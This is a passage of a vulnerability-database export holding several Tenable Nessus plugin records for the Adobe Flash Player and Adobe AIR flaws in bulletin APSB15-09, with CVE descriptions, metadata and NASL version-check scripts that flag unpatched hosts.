(CVE-2015-3044)\n\n - Multiple unspecified type confusion flaws exist that allow an attacker to execute arbitrary code.\n (CVE-2015-3077, CVE-2015-3084, CVE-2015-3086)\n\n - Multiple memory corruption flaws exist due to improper validation of user-supplied input. A remote attacker can exploit these flaws, via specially crafted flash content, to corrupt memory and execute arbitrary code.\n (CVE-2015-3078, CVE-2015-3089, CVE-2015-3090, CVE-2015-3093)\n\n - An unspecified security bypass exists that allows a context-dependent attacker to disclose sensitive information. (CVE-2015-3079)\n\n - An unspecified use-after-free error exists that allows an attacker to execute arbitrary code. (CVE-2015-3080)\n\n - An unspecified time-of-check time-of-use (TOCTOU) race condition exists that allows an attacker to bypass Protected Mode for Internet Explorer. (CVE-2015-3081)\n\n - Multiple validation bypass vulnerabilities exist that allow an attacker to read and write arbitrary data to the file system. (CVE-2015-3082, CVE-2015-3083, CVE-2015-3085)\n\n - An integer overflow condition exists due to improper validation of user-supplied input. This allows a context-dependent attacker to execute arbitrary code.\n (CVE-2015-3087)\n\n - A heap-based buffer overflow exists due to improper validation of user-supplied input. A remote attacker can exploit this to execute arbitrary code. (CVE-2015-3088)\n\n - Multiple unspecified memory leaks exist that allow an attacker to bypass the Address Space Layout Randomization (ASLR) feature. (CVE-2015-3091, CVE-2015-3092)", "edition": 6, "reporter": "Tenable", "published": "2015-05-12T00:00:00", "title": "Adobe Flash Player <= 17.0.0.169 Multiple Vulnerabilities (APSB15-09) (Mac OS X)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "MacOS X Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "modified": "2018-07-14T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "MACOSX_FLASH_PLAYER_APSA15-09.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=83367", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83367);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/07/14 1:59:36\");\n\n script_cve_id(\n \"CVE-2015-3044\",\n \"CVE-2015-3077\",\n \"CVE-2015-3078\",\n \"CVE-2015-3079\",\n \"CVE-2015-3080\",\n \"CVE-2015-3081\",\n \"CVE-2015-3082\",\n \"CVE-2015-3083\",\n \"CVE-2015-3084\",\n \"CVE-2015-3085\",\n \"CVE-2015-3086\",\n \"CVE-2015-3087\",\n \"CVE-2015-3088\",\n \"CVE-2015-3089\",\n \"CVE-2015-3090\",\n \"CVE-2015-3091\",\n \"CVE-2015-3092\",\n \"CVE-2015-3093\"\n );\n script_bugtraq_id(\n 74605,\n 74608,\n 74609,\n 74610,\n 74612,\n 74613,\n 74614,\n 74616,\n 74617\n );\n\n script_name(english:\"Adobe Flash Player <= 17.0.0.169 Multiple Vulnerabilities (APSB15-09) (Mac OS X)\");\n script_summary(english:\"Checks the version of Flash Player.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Flash Player installed on the remote Mac OS X\nhost is equal or prior to version 17.0.0.169. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An unspecified security bypass vulnerability exists that\n allows an attacker to disclose sensitive information.\n (CVE-2015-3044)\n\n - Multiple unspecified type confusion flaws exist that\n allow an attacker to execute arbitrary code.\n (CVE-2015-3077, CVE-2015-3084, CVE-2015-3086)\n\n - Multiple memory corruption flaws exist due to improper\n validation of user-supplied input. A remote attacker can\n exploit these flaws, via specially crafted flash\n content, to corrupt memory and execute arbitrary code.\n (CVE-2015-3078, CVE-2015-3089, CVE-2015-3090,\n CVE-2015-3093)\n\n - An unspecified security bypass exists that allows a\n context-dependent attacker to disclose sensitive\n information. (CVE-2015-3079)\n\n - An unspecified use-after-free error exists that allows\n an attacker to execute arbitrary code. (CVE-2015-3080)\n\n - An unspecified time-of-check time-of-use (TOCTOU) race\n condition exists that allows an attacker to bypass\n Protected Mode for Internet Explorer. (CVE-2015-3081)\n\n - Multiple validation bypass vulnerabilities exist that\n allow an attacker to read and write arbitrary data to\n the file system. (CVE-2015-3082, CVE-2015-3083,\n CVE-2015-3085)\n\n - An integer overflow condition exists due to improper\n validation of user-supplied input. This allows a\n context-dependent attacker to execute arbitrary code.\n (CVE-2015-3087)\n\n - A heap-based buffer overflow exists due to improper\n validation of user-supplied input. A remote attacker can\n exploit this to execute arbitrary code. (CVE-2015-3088)\n\n - Multiple unspecified memory leaks exist that allow an\n attacker to bypass the Address Space Layout\n Randomization (ASLR) feature. (CVE-2015-3091,\n CVE-2015-3092)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-09.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 17.0.0.188 or later.\n\nAlternatively, Adobe has made version 13.0.0.289 available for those\ninstallations that cannot be upgraded to 17.x.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ShaderJob Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/05/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"macosx_flash_player_installed.nasl\");\n script_require_keys(\"MacOSX/Flash_Player/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"MacOSX/Flash_Player/Version\");\npath = get_kb_item_or_exit(\"MacOSX/Flash_Player/Path\");\n\nif (ver_compare(ver:version, fix:\"14.0.0.0\", strict:FALSE) >= 0)\n{\n cutoff_version = \"17.0.0.169\";\n fix = \"17.0.0.188\";\n}\nelse\n{\n cutoff_version = \"13.0.0.281\";\n fix = \"13.0.0.289\";\n}\n\n# nb: we're checking for versions less than *or equal to* the cutoff!\nif (ver_compare(ver:version, fix:cutoff_version, strict:FALSE) <= 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Flash Player for Mac\", version, path);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:36:06", "references": ["http://www.nessus.org/u?0cb17c10", "https://helpx.adobe.com/security/products/flash-player/apsb15-09.html"], "pluginID": "84157", "description": "According to its version, the installation of Adobe AIR on the remote Windows host is equal or prior to 17.0.0.144. It is, therefore, affected by multiple vulnerabilities :\n\n - An unspecified security bypass vulnerability exists that allows an attacker to disclose sensitive information.\n (CVE-2015-3044)\n\n - Multiple unspecified type confusion flaws exist that allow an attacker to execute arbitrary code.\n (CVE-2015-3077, CVE-2015-3084, CVE-2015-3086)\n\n - Multiple memory corruption flaws exist due to improper validation of user-supplied input. A remote attacker can exploit these flaws, via specially crafted flash content, to corrupt memory and execute arbitrary code.\n (CVE-2015-3078, CVE-2015-3089, CVE-2015-3090, CVE-2015-3093)\n\n - An unspecified security bypass exists that allows a context-dependent attacker to disclose sensitive information. (CVE-2015-3079)\n\n - An unspecified use-after-free error exists that allows an attacker to execute arbitrary code. (CVE-2015-3080)\n\n - An unspecified time-of-check time-of-use (TOCTOU) race condition exists that allows an attacker to bypass Protected Mode for Internet Explorer. (CVE-2015-3081)\n\n - Multiple validation bypass vulnerabilities exist that allow an attacker to read and write arbitrary data to the file system. (CVE-2015-3082, CVE-2015-3083, CVE-2015-3085)\n\n - An integer overflow condition exists due to improper validation of user-supplied input. This allows a context-dependent attacker to execute arbitrary code.\n (CVE-2015-3087)\n\n - A heap-based buffer overflow exists due to improper validation of user-supplied input. A remote attacker can exploit this to execute arbitrary code. (CVE-2015-3088)\n\n - Multiple unspecified memory leaks exist that allow an attacker to bypass the Address Space Layout Randomization (ASLR) feature. (CVE-2015-3091, CVE-2015-3092)", "edition": 7, "reporter": "Tenable", "published": "2015-06-12T00:00:00", "title": "Adobe AIR <= 17.0.0.144 Multiple Vulnerabilities (APSB15-09)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Windows", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "modified": "2018-06-27T00:00:00", "cpe": ["cpe:/a:adobe:air"], "id": "ADOBE_AIR_APSB15-09.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=84157", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84157);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/06/27 18:42:26\");\n\n script_cve_id(\n \"CVE-2015-3044\",\n \"CVE-2015-3077\",\n \"CVE-2015-3078\",\n \"CVE-2015-3079\",\n \"CVE-2015-3080\",\n \"CVE-2015-3081\",\n \"CVE-2015-3082\",\n \"CVE-2015-3083\",\n \"CVE-2015-3084\",\n \"CVE-2015-3085\",\n \"CVE-2015-3086\",\n \"CVE-2015-3087\",\n \"CVE-2015-3088\",\n \"CVE-2015-3089\",\n \"CVE-2015-3090\",\n \"CVE-2015-3091\",\n \"CVE-2015-3092\",\n \"CVE-2015-3093\"\n );\n script_bugtraq_id(\n 74605,\n 74608,\n 74609,\n 74610,\n 74612,\n 74613,\n 74614,\n 74616,\n 74617\n );\n\n script_name(english:\"Adobe AIR <= 17.0.0.144 Multiple Vulnerabilities (APSB15-09)\");\n script_summary(english:\"Checks the version gathered by local check.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a version of Adobe AIR installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the installation of Adobe AIR on the remote\nWindows host is equal or prior to 17.0.0.144. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An unspecified security bypass vulnerability exists that\n allows an attacker to disclose sensitive information.\n (CVE-2015-3044)\n\n - Multiple unspecified type confusion flaws exist that\n allow an attacker to execute arbitrary code.\n (CVE-2015-3077, CVE-2015-3084, CVE-2015-3086)\n\n - Multiple memory corruption flaws exist due to improper\n validation of user-supplied input. A remote attacker can\n exploit these flaws, via specially crafted flash\n content, to corrupt memory and execute arbitrary code.\n (CVE-2015-3078, CVE-2015-3089, CVE-2015-3090,\n CVE-2015-3093)\n\n - An unspecified security bypass exists that allows a\n context-dependent attacker to disclose sensitive\n information. (CVE-2015-3079)\n\n - An unspecified use-after-free error exists that allows\n an attacker to execute arbitrary code. (CVE-2015-3080)\n\n - An unspecified time-of-check time-of-use (TOCTOU) race\n condition exists that allows an attacker to bypass\n Protected Mode for Internet Explorer. (CVE-2015-3081)\n\n - Multiple validation bypass vulnerabilities exist that\n allow an attacker to read and write arbitrary data to\n the file system. (CVE-2015-3082, CVE-2015-3083,\n CVE-2015-3085)\n\n - An integer overflow condition exists due to improper\n validation of user-supplied input. This allows a\n context-dependent attacker to execute arbitrary code.\n (CVE-2015-3087)\n\n - A heap-based buffer overflow exists due to improper\n validation of user-supplied input. A remote attacker can\n exploit this to execute arbitrary code. (CVE-2015-3088)\n\n - Multiple unspecified memory leaks exist that allow an\n attacker to bypass the Address Space Layout\n Randomization (ASLR) feature. (CVE-2015-3091,\n CVE-2015-3092)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-09.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Adobe AIR 17.0.0.172 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ShaderJob Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/05/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:air\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"adobe_air_installed.nasl\");\n script_require_keys(\"SMB/Adobe_AIR/Version\", \"SMB/Adobe_AIR/Path\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"SMB/Adobe_AIR/Version\");\npath = get_kb_item_or_exit(\"SMB/Adobe_AIR/Path\");\n\nversion_ui = get_kb_item(\"SMB/Adobe_AIR/Version_UI\");\nif (isnull(version_ui)) version_report = version;\nelse version_report = version_ui + ' (' + version + ')';\n\ncutoff_version = '17.0.0.144';\nfix = '17.0.0.172';\nfix_ui = '17.0';\n\nif (ver_compare(ver:version, fix:cutoff_version) <= 0)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version_report +\n '\\n Fixed version : ' + fix_ui + \" (\" + fix + ')' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Adobe AIR\", version_report, path);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:40:47", "references": ["http://support.novell.com/security/cve/CVE-2015-3090.html", "http://support.novell.com/security/cve/CVE-2015-3078.html", "http://support.novell.com/security/cve/CVE-2015-3080.html", "http://support.novell.com/security/cve/CVE-2015-3083.html", "http://support.novell.com/security/cve/CVE-2015-3082.html", "http://support.novell.com/security/cve/CVE-2015-3091.html", "http://support.novell.com/security/cve/CVE-2015-3081.html", "http://support.novell.com/security/cve/CVE-2015-3086.html", "http://support.novell.com/security/cve/CVE-2015-3089.html", "http://support.novell.com/security/cve/CVE-2015-3088.html", "http://support.novell.com/security/cve/CVE-2015-3079.html", "https://bugzilla.novell.com/show_bug.cgi?id=930677", "http://support.novell.com/security/cve/CVE-2015-3085.html", "http://support.novell.com/security/cve/CVE-2015-3093.html", "http://support.novell.com/security/cve/CVE-2015-3087.html", "http://support.novell.com/security/cve/CVE-2015-3077.html", "http://support.novell.com/security/cve/CVE-2015-3084.html", "http://support.novell.com/security/cve/CVE-2015-3092.html", "http://support.novell.com/security/cve/CVE-2015-3044.html"], "pluginID": "83486", "description": "The Adobe flash-player package was updated to version 11.2.202.460 to fix several security issues :\n\nAPSB15-09, CVE-2015-3044 / CVE-2015-3077 / CVE-2015-3078 / CVE-2015-3079 / CVE-2015-3080 / CVE-2015-3081 / CVE-2015-3082 / CVE-2015-3083 / CVE-2015-3084 / CVE-2015-3085 / CVE-2015-3086 / CVE-2015-3087 / CVE-2015-3088 / CVE-2015-3089 / CVE-2015-3090 / CVE-2015-3091 / CVE-2015-3092 / CVE-2015-3093.\n\nMore information can be found at the Adobe Security Bulletin APSB15-09:\nhttps://helpx.adobe.com/security/products/flash-player/apsb15-09.html .", "edition": 5, "reporter": "Tenable", "published": "2015-05-15T00:00:00", "title": "SuSE 11.3 Security Update : flash-player (SAT Patch Number 10680)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "modified": "2016-12-21T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:flash-player-gnome", "p-cpe:/a:novell:suse_linux:11:flash-player-kde4", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:flash-player"], "id": "SUSE_11_FLASH-PLAYER-150514.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=83486", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83486);\n script_version(\"$Revision: 2.8 $\");\n script_cvs_date(\"$Date: 2016/12/21 20:21:20 $\");\n\n script_cve_id(\"CVE-2015-3044\", \"CVE-2015-3077\", \"CVE-2015-3078\", \"CVE-2015-3079\", \"CVE-2015-3080\", \"CVE-2015-3081\", \"CVE-2015-3082\", \"CVE-2015-3083\", \"CVE-2015-3084\", \"CVE-2015-3085\", \"CVE-2015-3086\", \"CVE-2015-3087\", \"CVE-2015-3088\", \"CVE-2015-3089\", \"CVE-2015-3090\", \"CVE-2015-3091\", \"CVE-2015-3092\", \"CVE-2015-3093\");\n\n script_name(english:\"SuSE 11.3 Security Update : flash-player (SAT Patch Number 10680)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Adobe flash-player package was updated to version 11.2.202.460 to\nfix several security issues :\n\nAPSB15-09, CVE-2015-3044 / CVE-2015-3077 / CVE-2015-3078 /\nCVE-2015-3079 / CVE-2015-3080 / CVE-2015-3081 / CVE-2015-3082 /\nCVE-2015-3083 / CVE-2015-3084 / CVE-2015-3085 / CVE-2015-3086 /\nCVE-2015-3087 / CVE-2015-3088 / CVE-2015-3089 / CVE-2015-3090 /\nCVE-2015-3091 / CVE-2015-3092 / CVE-2015-3093.\n\nMore information can be found at the Adobe Security Bulletin\nAPSB15-09:\nhttps://helpx.adobe.com/security/products/flash-player/apsb15-09.html\n.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=930677\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3044.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3077.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3078.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3079.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3080.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3081.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3082.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3083.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3084.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3085.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3086.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3087.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3088.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3089.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3090.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3091.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3092.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3093.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 10680.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ShaderJob Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, \"SuSE 11.3\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-11.2.202.460-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-gnome-11.2.202.460-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-kde4-11.2.202.460-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-11.2.202.460-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-gnome-11.2.202.460-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-kde4-11.2.202.460-0.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:00:31", "references": ["https://support.microsoft.com/kb/3061904", "https://helpx.adobe.com/security/products/flash-player/apsb15-09.html", "https://technet.microsoft.com/library/security/2755801"], "pluginID": "83369", "description": "The remote Windows host is missing KB3061904. It is, therefore, affected by the following vulnerabilities :\n\n - An unspecified security bypass vulnerability exists that allows an attacker to disclose sensitive information.\n (CVE-2015-3044)\n\n - Multiple unspecified type confusion flaws exist that allow an attacker to execute arbitrary code.\n (CVE-2015-3077, CVE-2015-3084, CVE-2015-3086)\n\n - Multiple memory corruption flaws exist due to improper validation of user-supplied input. A remote attacker can exploit these flaws, via specially crafted flash content, to corrupt memory and execute arbitrary code.\n (CVE-2015-3078, CVE-2015-3089, CVE-2015-3090, CVE-2015-3093)\n\n - An unspecified security bypass exists that allows an unauthenticated, remote attacker to disclose sensitive information. (CVE-2015-3079)\n\n - An unspecified use-after-free error exists that allows an attacker to execute arbitrary code. (CVE-2015-3080)\n\n - An unspecified time-of-check time-of-use (TOCTOU) race condition exists that allows an attacker to bypass Protected Mode for Internet Explorer. (CVE-2015-3081)\n\n - Multiple validation bypass vulnerabilities exist that allow an attacker to read and write arbitrary data to the file system. (CVE-2015-3082, CVE-2015-3083, CVE-2015-3085)\n\n - An integer overflow condition exists due to improper validation of user-supplied input. This allows an unauthenticated, remote attacker to execute arbitrary code. (CVE-2015-3087)\n\n - A heap-based buffer overflow exists due to improper validation of user-supplied input. A remote attacker can exploit this to execute arbitrary code. (CVE-2015-3088)\n\n - Multiple unspecified memory leaks exist that allow an attacker to bypass the Address Space Layout Randomization (ASLR) feature. (CVE-2015-3091, CVE-2015-3092)", "edition": 8, "reporter": "Tenable", "published": "2015-05-12T00:00:00", "title": "MS KB3061904: Update for Vulnerabilities in Adobe Flash Player in Internet Explorer", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Windows", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "modified": "2018-07-27T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:adobe:flash_player"], "id": "SMB_KB3061904.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=83369", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83369);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2018/07/27 18:38:15\");\n\n script_cve_id(\n \"CVE-2015-3044\",\n \"CVE-2015-3077\",\n 